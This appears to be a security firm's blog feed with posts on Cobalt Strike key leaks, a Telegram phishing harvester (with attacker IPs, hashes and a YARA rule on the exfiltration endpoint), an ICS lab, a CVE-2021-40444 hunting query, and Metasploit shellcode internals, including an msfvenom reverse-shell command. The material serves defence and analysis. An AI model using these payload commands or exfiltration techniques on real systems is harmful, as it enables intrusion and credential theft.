Jonas is NVISO’s red team lead and thus involved in all red team exercises, either from a project management perspective (non-technical), for the execution of fieldwork (technical), or a combination of both. You can find Jonas on LinkedIn.

Cobalt Strike: Using Known Private Keys To Decrypt Traffic – Part 1

21 October 2021 at 08:59

We found 6 private keys for rogue Cobalt Strike software, enabling C2 network traffic decryption.

The communication between a Cobalt Strike beacon (client) and a Cobalt Strike team server (C2) is encrypted with AES (even when it takes place over HTTPS). The AES key is generated by the beacon, and communicated to the C2 using an encrypted metadata blob (a cookie, by default).

RSA encryption is used to encrypt this metadata: the beacon has the public key of the C2, and the C2 has the private key.
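This hybrid key exchange can be illustrated with a toy example. To be clear, this is a sketch of the principle only: the textbook RSA key pair below (p=61, q=53) is made up for illustration and bears no relation to Cobalt Strike's actual 2048-bit RSA keys or AES-256 session keys.

```python
# Toy illustration of the key exchange described above -- NOT Cobalt Strike's
# actual crypto. The beacon encrypts its symmetric session key with the C2's
# public key; only the holder of the private key can recover it.
import secrets

n, e, d = 3233, 17, 2753  # toy public modulus/exponent and private exponent

beacon_key = secrets.randbelow(n - 2) + 2      # stand-in for the AES session key
encrypted_metadata = pow(beacon_key, e, n)     # beacon side: encrypt with public key
recovered_key = pow(encrypted_metadata, d, n)  # C2 side: decrypt with private key

assert recovered_key == beacon_key
```

Whoever obtains the private exponent — as we did for the 6 leaked key pairs — can perform the C2-side decryption on captured traffic.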

Figure 1: C2 traffic

Public and private keys are stored in file .cobaltstrike.beacon_keys. These keys are generated when the Cobalt Strike team server software is used for the first time.

During our fingerprinting of Internet-facing Cobalt Strike servers, we found public keys that are used by many different servers. This implies that they use the same private key, and thus that their .cobaltstrike.beacon_keys file is shared.

One possible explanation we verified: are there cracked versions of Cobalt Strike, used by malicious actors, that include a .cobaltstrike.beacon_keys? This file is not part of a legitimate Cobalt Strike package, as it is generated at first time use.

Searching through VirusTotal, we found 10 cracked Cobalt Strike packages: ZIP files containing a file named .cobaltstrike.beacon_keys. Out of these 10 packages, we extracted 6 unique RSA key pairs.

2 of these pairs are prevalent on the Internet: 25% of the Cobalt Strike servers we fingerprinted (1500+) use one of these 2 key pairs.

This key information is now included in tool 1768.py, a tool developed by Didier Stevens to extract configurations of Cobalt Strike beacons.

Whenever a public key with a known private key is extracted, the tool highlights this:

Figure 2: 1768.py extracting configuration from beacon

At minimum, this information is further confirmation that the sample came from a rogue Cobalt Strike server (and not a red team server).

Using option verbose, the private key is also displayed.

Figure 3: using option verbose to display the private key

This can then be used to decrypt the metadata, and the C2 traffic (more on this later).

Figure 4: decrypting metadata

In upcoming blog posts, we will show in detail how to use these private keys to decrypt metadata and decrypt C2 traffic.

About the authors
Didier Stevens is a malware expert working for NVISO. Didier is a SANS Internet Storm Center senior handler and Microsoft MVP, and has developed numerous popular tools to assist with malware analysis. You can find Didier on Twitter and LinkedIn.

You can follow NVISO Labs on Twitter to stay up to date on all our future research and publications.

All aboard the internship – whispering past defenses and sailing into kernel space

13 October 2021 at 12:25

Previously, we have already published Sander’s (@cerbersec) internship testimony. Since this post does not really contain any juicy technical details and Sander has done a terrific job putting together a walkthrough of his process, we thought it would be a waste not to highlight his previous posts again.

In Part 1, Sander explains how he started his journey and dove into process injection techniques, WIN32 API (hooking), userland vs kernel space, and Cobalt Strike’s Beacon Object Files (BOF).

Just being able to perform process injection using direct syscalls from a BOF did not signal the end of his journey yet, on the contrary. In Part 2, Sander extended our BOF arsenal with additional process injection techniques and persistence. With all this functionality bundled in an Aggressor Script, CobaltWispers was born.

We are considering open-sourcing this little framework, but some final tweaks would be required first, as explained in the part 2 blog post.

While this is the end (for now) of Sander’s BOF journey, we have another challenging topic lined up for him: The Kernel. Here’s a little sneak peek of the next blog series/walkthrough we will be releasing. Stay tuned!

KdPrint(“Hello, world!\n”);

When I finished my previous internship, which was focused on bypassing Endpoint Detection and Response (EDR) software and Anti-Virus (AV) software from a user land point of view, we joked around with the idea that the next topic would be defeating the same problem but from kernel land. At that point in time I had no experience at all with the Windows kernel and it all seemed very advanced and above my level of technical ability. As I write this blogpost, I have to admit it wasn’t as scary or difficult as I thought it to be. C/C++ is still C/C++ and assembly instructions are still headache-inducing, but comprehensible with the right resources and time dedication.

In this first post, I will lay out some of the technical concepts and ideas behind the goal of this internship, as well as reflect back on my first steps in successfully bypassing/disabling a reputable Anti-Virus product, but more on that later.

About the authors

Jonas is NVISO’s red team lead and thus involved in all red team exercises, either from a project management perspective (non-technical), for the execution of fieldwork (technical), or a combination of both. You can find Jonas on LinkedIn.
Sander is a cyber security student with a passion for red teaming and malware development. He’s a two-time intern at NVISO and a future NVISO bird.

Phish, Phished, Phisher: A Quick Peek Inside a Telegram Harvester

4 October 2021 at 09:39

The tale is told by many: to access this document, “Sign in to your account” — During our daily Managed Detection and Response operations, NVISO handles hundreds of user-reported phishing threats which made it past commercial anti-phishing solutions. To ensure user safety, each report is carefully reviewed for Indicators of Compromise (IoCs) which are blocked and shared in threat intelligence feeds.

It is quite common to observe phishing pages on compromised hosts, legitimate services or, as will be the case for this blog post, directly delivered as an attachment. While it is trivial to get a phishing page, identifying a campaign’s extent usually requires global telemetry.

In one of the smaller campaigns we monitored last month (September 2021), the threat actor inadvertently exposed Telegram credentials to their harvester. This opportunity provided us some insight into their operations; a peek behind the curtains we wanted to share.

From Phish

The initial malicious attachment, reported by an end-user, is a typical phishing attachment file (.htm) delivered by a non-business email address (hotmail[.]co[.]uk), courtesy of “Onedrive for Business”. While we have observed some elaborate attempts in the past, it is quite obvious from a first glance that little effort has been put into this attempt.

Figure 1: A capture of the reported email with the spoofed recipient name, recipient and warning-banner redacted.

Upon opening the phishing attachment, the user would be presented with a pre-filled login form. The form impersonates the usual Microsoft login page in an attempt to grab valid credentials.

Figure 2: A capture of the Office 365 phishing attachment with the pre-filled credentials redacted.

If the user is successfully tricked into signing in, a piece of in-line Javascript exfiltrates the credentials to a harvesting channel. This is performed through a simple GET request towards the api[.]telegram[.]org domain with the phished email address, password and IP included as parameters.

Figure 3: A capture of the credential harvesting Javascript code.
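The request built by that Javascript can be sketched as follows. The bot token, chat_id and credentials below are made up, and the URL is only constructed, never requested.

```python
# Sketch of the exfiltration request: a single GET to the Telegram Bot API's
# sendMessage method with the phished data as parameters. All values are fake.
from urllib.parse import urlencode

def build_exfil_url(token, chat_id, email, password, ip):
    text = f"Email: {email}\nPass: {password}\nIP: {ip}"
    return f"https://api.telegram.org/bot{token}/sendMessage?" + urlencode({"chat_id": chat_id, "text": text})

url = build_exfil_url("0000000000:FAKE-TOKEN", "1937990321", "victim@example.com", "hunter2", "203.0.113.7")
```

Because the bot token travels in every such request, anyone who obtains the phishing page — as we did — also obtains access to the harvesting channel.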

As the analysis of the 1937990321 campaign’s document exposed harvester credentials, our curiosity led us to identify additional documents and campaigns through VirusTotal Livehunt.

Campaign   | Operator                      | Bot           | Lures             | Victims
1937990321 | ade                           | allgood007bot | Office 365        | 400
1168596795 | eric jones (stealthrain76745) | omystical_bot | Office 365, Excel | 95
1036920388 | PRo ✔️ (Emhacker)             | proimp1_bot   | M&T Bank, Unknown | 127
Figure 4: An overview of Telegram-based campaigns with code-similarity.
Figure 5: A capture of the Excel (left) and US-based M&T Bank (right) lures.

While we managed to identify the M&T Bank campaign (1036920388), we were unable to identify successful phishing attempts. Most of the actor’s harvesting history contained bad data, with occasional stolen data originating from unknown lures. As such, the remainder of this blog post will not take the 1036920388 dataset into account.

To Phished

Throughout the second half of September, the malicious Telegram bots exfiltrated over 3,386 credentials belonging to 495 distinct victims.

Figure 6: Telegram channel messages over time.

If we take a look at the victim distribution in figure 7, we notice a distinct focus on UK-originating accounts.

Figure 7: The victims’ geographical proportions.

Over 94% of the phished accounts belong to the non-corporate Microsoft mail services. These personal accounts are usually more vulnerable as they lack both enterprise-grade protections (e.g.: Microsoft Defender for Office 365) and policies (e.g.: Azure AD Conditional Access Policies).

Figure 8: The victims’ domain proportions.

While the 5% of collected corporate credentials can act as initial access for hands-on-keyboard operations, do the remaining 95% get discarded?

To Phisher

One remaining fact of interest in the 1937990321 campaign’s dataset is the presence of a compromised alisonb account as can be observed in figure 9.

Figure 9: A compromised account re-used for phishing delivery.

The alisonb account is in fact the original account that targeted one of NVISO’s customers. This highlights the common cycle of phishing:

  • Corporate accounts are filtered for initial access.
  • Remaining accounts are used for further phishing.

Identifying these accounts as soon as they’re compromised allows us to preemptively gray-list them, making sure the phishing cycle gets broken.

The Baddies

The Telegram channels furthermore contain records of the actors starting (/start command) and testing their collection methods. These tests exposed two IPs likely part of the actors’ VPN infrastructure:

  • 91[.]132[.]230[.]75 located in Russia
  • 149[.]56[.]190[.]182 located in Canada
Figure 10: The threat actor performing end-to-end tests.

In addition to the above test messages, we managed to identify an actor's screen capture of the conversation. By cross-referencing the message times with the obtained logs, we can assess with high confidence that the device of eric jones, the 1168596795 campaign operator, runs in English and operates from the UTC+2 time zone.

Figure 11: An actor-made screen capture of the test messages.

To further confirm our theory, we can observe additional Telegram messages originating from the above actor IPs. The activity taking place between 9AM (UTC) and 10PM (UTC) tends to confirm the Canadian server is indeed geographically distant from the actor suspected of operating in UTC+2.

Figure 12: The threat actor interactions by time of the day (UTC).
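The timezone inference behind figure 12 boils down to bucketing message timestamps by hour of day. A minimal sketch, using made-up timestamps rather than the actual channel logs:

```python
# Bucket channel message timestamps (UTC) by hour and inspect the active window.
from collections import Counter
from datetime import datetime

timestamps = ["2021-09-20 09:14", "2021-09-20 13:40", "2021-09-21 17:02", "2021-09-21 21:55"]
hours = Counter(datetime.strptime(t, "%Y-%m-%d %H:%M").hour for t in timestamps)

# an activity window of 9AM-10PM UTC is consistent with a UTC+2 workday ending around midnight
active_window = (min(hours), max(hours))
```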

Final Thoughts

We rarely get the opportunity to peek behind a phishing operation’s curtains. While the observed campaigns were quite small, identifying the complete phishing cycle with the alisonb account was quite satisfying.

Our short analysis of the events enabled NVISO to protect its customers from accounts likely to be used for phishing in the coming days, and further acts as a reminder that even obvious phishing emails can nonetheless be successful.

Indicators and Rules


The following files were analyzed to identify harvester credentials. Many more Excel lures can be identified through the EXCELL typo in VirusTotal.

SHA256 Campaign Lure
696f2cf8a36be64c281fd940c3f0081eb86a4a79f41375ba70ca70432c71ca29 1937990321 Office 365
2cc9d3ad6a3c2ad5cced10a431f99215e467bfca39cf02732d739ff04e87be2d 1168596795 Excel
209b842abd1cfeab75c528595f0154ef74b5e92c9cc715d18c3f89473edfeff9 1168596795 Excel
acc4c5c40d11e412bb343357e493d22fae70316a5c5af4ebf693340bc7616eae 1168596795 Excel
b7c8bb9e149997630b53d80ab901be1ffb22e1578f389412a7fdf1bd4668a018 1168596795 Excel
e36dd51410f74fa6af3d80c2193450cf85b4ba109df0c44f381407ef89469650 1168596795 Excel
a7af7c8b83fc2019c4eb859859efcbe8740d61c7d98fc8fa6ca27aa9b3491809 1168596795 Excel
ba9dd2ae20952858cdd6cfbaff5d3dd22b4545670daf41b37a744ee666c8f1dc 1036920388 M&T Bank
36368186cf67337e8ad69fd70b1bcb8f326e43c7ab83a88ad63de24d988750c2 1036920388 M&T Bank
7772cf6ab12cecf5ff84b23830c12b03e9aa2fae5d5b7d1c8a8aaa57525cb34e 1036920388 M&T Bank


//For a VirusTotal Livehunt rule, uncomment the "vt" related statements.
//import "vt"

rule phish_telegram_bot_api: testing TA0001 T1566 T1566_001
{
    meta:
        description = "Detects the presence of the Telegram Bot API endpoint often used as egress"
        author      = "Maxime THIEBAUT (@0xThiebaut)"
        date        = "2021-09-30"
        reference   = "https://blog.nviso.eu/2021/10/04/phish-phished-phisher-a-quick-peek-inside-a-telegram-harvester/"
        tlp         = "white"
        status      = "testing"

        tactic      = "TA0001"
        technique   = "T1566.001"

        hash1       = "696f2cf8a36be64c281fd940c3f0081eb86a4a79f41375ba70ca70432c71ca29"

    strings:
        $endpoint   = "https://api.telegram.org/bot"
        $command    = "/sendMessage"
        $option1    = "chat_id"
        $option2    = "text"
        $option3    = "parse_mode"
        $script     = "<script>"

    condition:
        all of them //and vt.metadata.file_type == vt.FileType.HTML
}

Building an ICS Firing Range – Part 2 (Defcon 29 ICS Village)

22 September 2021 at 11:06

As discussed in our first post in the series about our ICS firing range, we came to the conclusion that we had to build a lab ourselves. Now, this turned out to be quite a tricky task and in this blog post I am going to tell you why: which challenges we faced and which choices we made on our way to building our very own lab.
This was a rather long project and involved quite some steps. So to structure this post, I will guide you through the process of how we designed our lab by dividing it into the tasks we worked on in chronological order.

Requirements Analysis

Well, we knew that we were going to build this lab but we needed more information about the exact requirements it should meet so we could focus on those specifically. During internal discussions and meetings with the client we worked out this list of initial, key requirements:

  1. The lab shall feature IT and OT components that represent a realistic bridge-operation scenario.
  2. The lab shall be mobile so it can be transported, set up and worked with on different sites.
  3. The lab shall be extensible: scenarios and both hardware and software components can be added in the future.

These requirements were intentionally left rather broad so that we could work out different feasible concepts for individual challenges and decide with the client which way to go. This approach allowed us to stay in close contact with the client and make sure we met their needs.

Designing an ICS Firing Range

In order to build great things, you will need great plans. In this phase, we worked out said plans, starting with our very first concept.

1. The First Concept

Once we knew our key requirements, we started doing our research on the topic of operating bascule bridges. This was certainly easier said than done: it turned out that publicly available information about critical infrastructure, such as bridges, was not that easy to find.
Eventually we found a very good resource, the “Bridge Maintenance Reference Manual” provided by the Florida Department of Transportation (FDOT). This manual was a very good find since it detailed the general structure of bascule bridges and explained the most relevant components. Using this, we developed our first, simplified concept:

First 2D Concept of our Bridge Operation Scenario

It features the core components of bascule bridges:

  • Structural components such as the leaves, counterweights and pits (bottom part of the bridges)
  • Drives that move the actual bridge leaves, road barriers and counterweights-locks
  • LEDs that indicate STOP/GO signals for maritime and road traffic
  • An alarm (buzzer) that is turned on and beeps while the leaves are moving
Simple Blender 3D Mock-Up

We translated this into a first, early 3D model in Blender to get an idea of the dimensions and looks. While it was very much simplified, it allowed us to work out some ideas about shapes and placement of components.

This way we found out that a modular setup might provide much-needed flexibility for assembly and maintenance: the pits would provide a strong foundation to mount the remaining components onto, while the upper part (shown in green-ish color in the picture) would be made of two halves set atop the pit. Resting inside the pit would be a large stepper motor driving a pinion gear, which in turn drives a rack installed underneath the bridge leaf.

Satisfied with this concept, we moved on to working on the underlying infrastructure of the lab.

2. Blocking out the Infrastructure

From the start we knew that it would take a good number of systems and networks to represent a somewhat realistic ICS environment: we expected a bridge operator to have an enterprise network that their regular office workstations are connected to, which are probably domain joined. Furthermore, they would have a SCADA network that contains operator workstations for monitoring and controlling the remote bridge-sites, historians to record operational data, and engineering workstations to program PLCs and HMIs. These networks would be routed via a public demilitarized zone (DMZ) over the internet to a remote bridge site. Also, all of these networks would have their own subnets and feature a router that allows adequate routing between the networks and a firewall that specifies individual rules for incoming and outgoing traffic (with a DENY ALL default rule). We decided that virtualizing these machines and networks would be a good compromise between the resources demanded to implement them and the physical space they would take up.

Presumed Local Network Infrastructure of a Bridge Operator

In addition to the IT infrastructure, we also designed the OT part. We intended the diagram below to somewhat represent the lower levels of the Purdue model: There are three substations that represent individual cells for traffic lights, gates and leaf lifting operation. They contain sensors and drives (our level 0 devices, e.g. limit switches and motors) which are controlled by individual PLCs per cell. These PLCs are instructed by one central PLC that is connected to the SCADA network.

Presumed OT Environment of our Bridge Site Scenario

In addition to these rather traditional OT components, our client requested us to include CCTV functionality in the lab. For this we planned to use Raspberry Pis with PiCams.
This network design represented a sufficiently realistic ICS network and allowed for future additions. Time to move on!

3. Figuring Out Which OT Hardware to Use

Now that we knew what things we wanted to interact with physically (those being mainly motors and LEDs) and how to connect them to our lab networks, we started doing our research on suitable OT hardware.

Naturally, we were soon overwhelmed by the sheer number of devices to choose from: there were plenty of manufacturers that offered loads of different devices for a variety of different use-cases, requirements and budgets with an equally wide variety of different features, dependencies and compatibilities.

Confronted with this challenge (and severely lacking expertise in building OT environments), we decided to make assumptions that helped us trim down the selection of manufacturers and devices and make educated decisions:

  • We would assume that, for a single operation site, one would stick to devices of one single manufacturer. This allowed us to largely ignore cross-manufacturer-compatibility. We chose SIEMENS for their significant European market-share in ICS hardware.
  • In order to reduce the complexity of building and interconnecting the OT devices, we decided to implement communication via ethernet exclusively and ignore other communication media and interfaces.
  • To represent a realistic and “historically grown” (e.g. occasionally updated and maybe upgraded across decades) operation site, we would use devices of varying EOL (end of life). We decided to include legacy PLCs (S7-300), all-rounder “standard” PLCs (S7-1200), modern high-end PLCs (S7-1500) and standard HMIs (TP700).
Us (left) when we faced dozens of datasheets of SIEMENS, ABB and Mitsubishi devices.

At this point, all that was left to do was to figure out which PLC to use for which task. This required digging through quite a few datasheets of the above-mentioned PLCs, mainly to find out how many and which digital inputs and outputs the PLCs feature. For example, we learned that, to control stepper motors, we needed to create pulse signals (in our case Pulse-Train Outputs, PTOs) of up to 100kHz. During our research, a rather cheap signal board for the S7-1200 turned up that could generate PTOs of up to 200kHz. We ended up using the S7-1200 PLCs to drive the leaves and barriers, the S7-300 to control the LEDs and the buzzer, and the S7-1500 for orchestration and outbound communication to the virtualized IT environment.
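The relation between PTO frequency and motor speed is simple arithmetic. The sketch below is a back-of-the-envelope check under our own assumptions (a typical 1.8° stepper with 200 full steps per revolution and 1/16 microstepping), not figures from any datasheet:

```python
# Back-of-the-envelope check: the PTO frequency needed to spin a stepper at a
# given RPM. Assumes 200 full steps/rev (a typical 1.8-degree stepper) and
# configurable microstepping -- illustrative values, not datasheet figures.
def required_pto_hz(rpm, full_steps_per_rev=200, microsteps=16):
    pulses_per_rev = full_steps_per_rev * microsteps
    return rpm / 60.0 * pulses_per_rev

# 300 RPM at 1/16 microstepping needs a 16 kHz pulse train -- comfortably
# within a 100-200 kHz PTO budget
assert required_pto_hz(300) == 16000.0
```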

4. Our Vision

With all the information we had worked out, we came up with a vision of what we wanted our lab to look like:

3D concept of the mobile lab

It’s essentially an aluminium frame on wheels, featuring a 3D printed bridge on top and a steel plate placed inside it vertically. The OT components are mounted onto the front-facing side of the steel plate and the virtualization server running the IT systems and networks is located in the back. The black panels are made of wood and hide the power distribution and the server. It may be hard to pick up visually, but there are acrylic glass panels on the sides and the front to provide a look inside.

With this vision in mind, we set out to build it!

We are going to cover this in the next blog post about our ICS firing range – Stay tuned!

Kusto hunting query for CVE-2021-40444

9 September 2021 at 14:52
By: bparys


On September 7th 2021, Microsoft published customer guidance concerning CVE-2021-40444, an MSHTML Remote Code Execution Vulnerability:

Microsoft is investigating reports of a remote code execution vulnerability in MSHTML that affects Microsoft Windows. Microsoft is aware of targeted attacks that attempt to exploit this vulnerability by using specially-crafted Microsoft Office documents.

An attacker could craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine. The attacker would then have to convince the user to open the malicious document. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.


In practice, the attack involves a specially-crafted Microsoft Office document that embeds an ActiveX control, which in turn activates the MSHTML component. The vulnerability itself resides in this MSHTML component.

Seeing there is reported exploitation in the wild (ITW), we decided to write a quick Kusto (KQL) rule that allows for hunting in Microsoft Defender ATP.

The query

let process = dynamic(["winword.exe","wordview.exe","wordpad.exe","powerpnt.exe","excel.exe"]);
DeviceImageLoadEvents
| where FileName in ("mshtml.dll", "Microsoft.mshtml.dll")
| where InitiatingProcessFileName in~ (process)
//We only want actual files ran, not Office restore operations etc.
| where strlen(InitiatingProcessCommandLine) > 40
| project Timestamp, DeviceName, InitiatingProcessFolderPath,
    InitiatingProcessParentFileName, InitiatingProcessParentCreationTime,
    InitiatingProcessCommandLine

In this query, the following is performed:

  • Add relevant Microsoft Office process names to an array;
  • Add both common filenames for MSHTML;
  • Require a command line longer than 40 characters: this weeds out false positives, for example where the command line only contains the process in question and a parameter such as /restore or /safe;
  • Display the results.
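For readers without Defender ATP access, the same filter logic can be approximated in plain Python. The field names mirror the advanced hunting schema; the sample events are fabricated for illustration.

```python
# Re-implementation of the hunting query's filter logic on fabricated events.
OFFICE_PROCESSES = {"winword.exe", "wordview.exe", "wordpad.exe", "powerpnt.exe", "excel.exe"}
MSHTML_FILES = {"mshtml.dll", "microsoft.mshtml.dll"}

def is_suspicious(event):
    return (event["FileName"].lower() in MSHTML_FILES
            and event["InitiatingProcessFileName"].lower() in OFFICE_PROCESSES
            and len(event["InitiatingProcessCommandLine"]) > 40)  # weed out /safe, /restore

events = [
    {"FileName": "mshtml.dll", "InitiatingProcessFileName": "WINWORD.EXE",
     "InitiatingProcessCommandLine": '"WINWORD.EXE" /n "C:\\Users\\a\\Downloads\\invoice-details.docx"'},
    {"FileName": "mshtml.dll", "InitiatingProcessFileName": "WINWORD.EXE",
     "InitiatingProcessCommandLine": '"WINWORD.EXE" /safe'},  # filtered: short command line
]
hits = [e for e in events if is_suspicious(e)]
```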


This was of course tested: a sample set of over 10,000 endpoints across several environments, spanning 7 days, delivered a total of 37 results. These results can be broken down as follows:

Figure 1 – Query Results

None of these processes are anomalous per se:

  • Explorer.exe: graphical user interface, the result of a user opening, for example, Microsoft Word from their Documents folder;
  • Protocolhandler.exe: handles URI schemes in Microsoft Office;
  • Outlook.exe: Microsoft’s email client;
  • Runtimebroker.exe: helps manage permissions from Microsoft Store apps (such as Microsoft Office).

While each of these processes warrant a closer look, you’ll be able to assess quicker if there’s anything anomalous going on by verifying what’s in the InitiatingProcessCommandLine column.

If it contains a remote web address, the file was likely opened from SharePoint or from another online location. If it does not contain a remote web address, the file is stored and opened locally.

Pay special attention to files opened locally or launched by Outlook as the parent process: chances are this is the result of a phishing email. In case you suspect a true positive:

  • Verify with the user if they have knowledge of opening this file, and if it was from an email they were expecting;
  • If possible, grab a copy of the file and use the option to submit to Microsoft (or a private sandbox of your choice; if public sandbox, then know that what you upload is public to everyone) to further determine if it is malicious;
  • Perform a separate investigation on the user or their device to determine if there’s any other events that may be out of the ordinary.

Ultimately, you can leverage the following process:

  • Run the query for a first time, and for a limited time period (7 days as in our example) or limited set of hosts;
  • Investigate each to create a baseline, and separate the wheat from the chaff (or the true from false positive);
  • Finetune the Kusto query above to your environment;
  • Happy hunting!


This actively exploited vulnerability in the MSHTML component in theory affects all Microsoft Office products that make use of it.

Patch as soon as Microsoft has a patch available (potentially, an out-of-band patch will be created soon) and apply the Mitigations and Workaround as described by Microsoft:


Thanks to our colleagues Remco and Niels for performing unit tests.

Anatomy and Disruption of Metasploit Shellcode

2 September 2021 at 16:04

In April 2021 we went through the anatomy of a Cobalt Strike stager and how some of its signature evasion techniques ended up being ineffective against detection technologies. In this blog post we will go one level deeper and focus on Metasploit, an often-used framework interoperable with Cobalt Strike.

Throughout this blog post we will cover the following topics:

  1. The shellcode’s import resolution – How Metasploit shellcode locates functions from other DLLs and how we can precompute these values to resolve any imports from other payload variants.
  2. The reverse-shell’s execution flow – How trivial a reverse shell actually is.
  3. Disruption of the Metasploit import resolution – A non-intrusive deception technique (no hooks involved) to have Metasploit notify the antivirus (AV) of its presence with high confidence.

For this analysis, we generated our own shellcode using Metasploit under version v6.0.30-dev. The malicious sample generated using the command below had a resulting SHA256 hash of 3792f355d1266459ed7c5615dac62c3a5aa63cf9e2c3c0f4ba036e6728763903 and is available on VirusTotal for readers willing to have a try themselves.

msfvenom -p windows/shell_reverse_tcp -a x86 > shellcode.vir

Throughout the analysis we have renamed functions, variables and offsets to reflect their role and improve clarity.

Initial Analysis

In this section we will outline the initial logic followed to determine the next steps of the analysis (import resolution and execution flow analysis).

While a typical executable contains one or more entry-points (exported functions, TLS-callbacks, …), shellcode can be seen as the most primitive code format where initial execution occurs from the first byte.

Analyzing the generated shellcode from the initial bytes outlines two operations:

  1. The first instruction at ① can be ignored from an analytical perspective. The cld operation clears the direction flag, ensuring string data is read on-wards instead of back-wards (e.g.: cmd vs dmc).
  2. The second call operation at ② transfers execution to a function we named Main, this function will contain the main logic of the shellcode.
Figure 1: Disassembled shellcode calling the Main function.

Within the Main function, we observe additional calls such as the four ones highlighted in the trimmed figure below (③, ④, ⑤ and ⑥). These calls target a yet unidentified function whose address is stored in the ebp register. To understand where this function is located, we will need to take a step back and understand how a call instruction operates.

Figure 2: Disassembly of the Main function.

A call instruction transfers execution to the target destination by performing two operations:

  1. It pushes the return address (the memory address of the instruction located after the call instruction) on the stack. This address can later be used by the ret instruction to return execution from the called function (callee) back to the calling function (caller).
  2. It transfers execution to the target destination (callee), as a jmp instruction would.
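The call-then-pop trick that follows can be modeled conceptually in Python (an illustrative sketch of the stack mechanics, not real x86 semantics; the 0x06 offset assumes the 1-byte cld followed by the 5-byte call instruction):

```python
# Conceptual model of `call Main` followed by `pop ebp` (illustrative only):
# the call pushes the return address, which Main immediately pops to learn
# where the code located right after the call instruction lives in memory.
stack = []

def call(target, return_address):
    stack.append(return_address)  # 1. push the return address
    return target()               # 2. transfer execution to the callee

def main():
    return stack.pop()            # `pop ebp`: recover the pushed address

# The byte right after `call Main` sits at offset 0x06 in this shellcode
# (1-byte cld followed by the 5-byte call instruction)
resolver = call(main, 0x06)
print(hex(resolver))  # 0x6
```

This is why shellcode so often starts with a call/pop pair: it is a position-independent way for the code to discover its own location.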

As such, the first pop instruction from the Main function at ③ stores the caller’s return address into the ebp register. This return address is then called as a function later on, among others at offsets 0x99, 0xA9 and 0xB8 (④, ⑤ and ⑥). This pattern, alongside the presence of a similar-looking push before each call, tends to suggest the return address stored within ebp is the dynamic import resolution function.

Without diving into unnecessary depth, a “normal” executable (e.g.: Portable Executable on Windows) contains the necessary information so that, once loaded by the Operating System (OS) loader, the code can call imported routines such as those from the Windows API (e.g.: LoadLibraryA). To achieve this default behavior, the executable is expected to have a certain structure which the OS can interpret. As shellcode is a bare-bone version of the code (it has none of the expected structures), the OS loader can’t assist it in resolving these imported functions; even more so, the OS loader will fail to “execute” a shellcode file. To cope with this problem, shellcode commonly performs a “dynamic import resolution”.

One of the most common techniques to perform “dynamic import resolution” is by hashing each available exported function and comparing it with the required import’s hash. As shellcode authors can’t always predict whether a specific DLL (e.g.: ws2_32.dll for Windows Sockets) and its exports are already loaded, it is not uncommon to observe shellcode loading DLLs by calling the LoadLibraryA function first (or one of its alternatives). Relying on LoadLibraryA (or alternatives) before calling other DLLs’ exports is a stable approach as these library-loading functions are part of kernel32.dll, one of the few DLLs which can be expected to be loaded into each process.

To confirm our above theory, we can search for all call instructions as can be seen in the following figure (e.g.: using IDA’s Text... option under the Search menu). Apart from the first call to the Main function, all instances refer to the ebp register. This observation, alongside well-known constants we will observe in the next section, supports our theory that the address stored in ebp holds a pointer to the function performing the dynamic import resolution.

Figure 3: All call instructions in the shellcode.

The abundance of calls towards the ebp register suggests it indeed holds a pointer to the import resolution function, which we now know is located right after the first call to Main.

Import Resolution Analysis

So far we noticed that the instructions following the initial call to Main play a crucial role, as we expect them to form the import resolution routine. Before we analyze the shellcode’s logic, let us analyze this resolution routine as it will ease the understanding of the remaining calls.

From Import Hash to Function

The code located immediately after the initial call to Main is where the import resolution starts. To resolve these imports, the routine first locates the list of modules loaded into memory as these contain their available exported functions.

To find these modules, an often leveraged shellcode technique is to interact with the Process Environment Block (shortened as PEB).

In computing the Process Environment Block (abbreviated PEB) is a data structure in the Windows NT operating system family. It is an opaque data structure that is used by the operating system internally, most of whose fields are not intended for use by anything other than the operating system. […] The PEB contains data structures that apply across a whole process, including global context, startup parameters, data structures for the program image loader, the program image base address, and synchronization objects used to provide mutual exclusion for process-wide data structures.


As can be observed in figure 4, to access the PEB, the shellcode accesses the Thread Environment Block (TEB) which is immediately accessible through a register (⑦). The TEB structure itself contains a pointer to the PEB (⑦). From the PEB, the shellcode can locate the PEB_LDR_DATA structure (⑧) which in turn contains a reference to multiple double-linked module lists. As can be observed at (⑨), the Metasploit shellcode leverages one of these double-linked lists (InMemoryOrderModuleList) to later iterate through the LDR_DATA_TABLE_ENTRY structures containing the loaded module information.

Once the first module is identified, the shellcode retrieves the module’s name (BaseDllName.Buffer) at ⑩ and the buffer’s maximum length ( BaseDllName.MaximumLength) at ⑪ which is required as the buffer is not guaranteed to be NULL-terminated.

Figure 4: Disassembly of the initial module retrieval.

One point worth highlighting is that, as opposed to usual pointers (TEB.ProcessEnvironmentBlock, PEB.Ldr, …), a double-linked list points to the next item’s list entry. This means that instead of pointing to the structures’ start, a pointer from the list will target a non-zero offset. As such, while in the following figure the LDR_DATA_TABLE_ENTRY has the BaseDllName property at offset 0x2C, the offset from the list entry’s perspective will be 0x24 (0x2C-0x08). This can be observed in the above figure 4 where an offset of 8 has to be subtracted to access both of the BaseDllName properties at ⑩ and ⑪.

Figure 5: From TEB to BaseDllName.
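The offset arithmetic can be verified with a simplified ctypes model of the 32-bit structures (a sketch for illustration only: field names follow the winternl definitions, but only the fields needed for the offset computation are modeled):

```python
import ctypes

# Simplified 32-bit LDR_DATA_TABLE_ENTRY layout (illustrative, not complete)
class UNICODE_STRING(ctypes.Structure):
    _fields_ = [('Length', ctypes.c_uint16),
                ('MaximumLength', ctypes.c_uint16),
                ('Buffer', ctypes.c_uint32)]  # 32-bit pointer

class LDR_DATA_TABLE_ENTRY(ctypes.Structure):
    _fields_ = [('InLoadOrderLinks', ctypes.c_uint32 * 2),            # 0x00
                ('InMemoryOrderLinks', ctypes.c_uint32 * 2),          # 0x08
                ('InInitializationOrderLinks', ctypes.c_uint32 * 2),  # 0x10
                ('DllBase', ctypes.c_uint32),                         # 0x18
                ('EntryPoint', ctypes.c_uint32),                      # 0x1C
                ('SizeOfImage', ctypes.c_uint32),                     # 0x20
                ('FullDllName', UNICODE_STRING),                      # 0x24
                ('BaseDllName', UNICODE_STRING)]                      # 0x2C

# Offset of BaseDllName from the structure's start, and from the
# InMemoryOrderLinks list entry the shellcode actually walks
start_offset = LDR_DATA_TABLE_ENTRY.BaseDllName.offset
list_offset = LDR_DATA_TABLE_ENTRY.InMemoryOrderLinks.offset
print(hex(start_offset), hex(start_offset - list_offset))  # 0x2c 0x24
```

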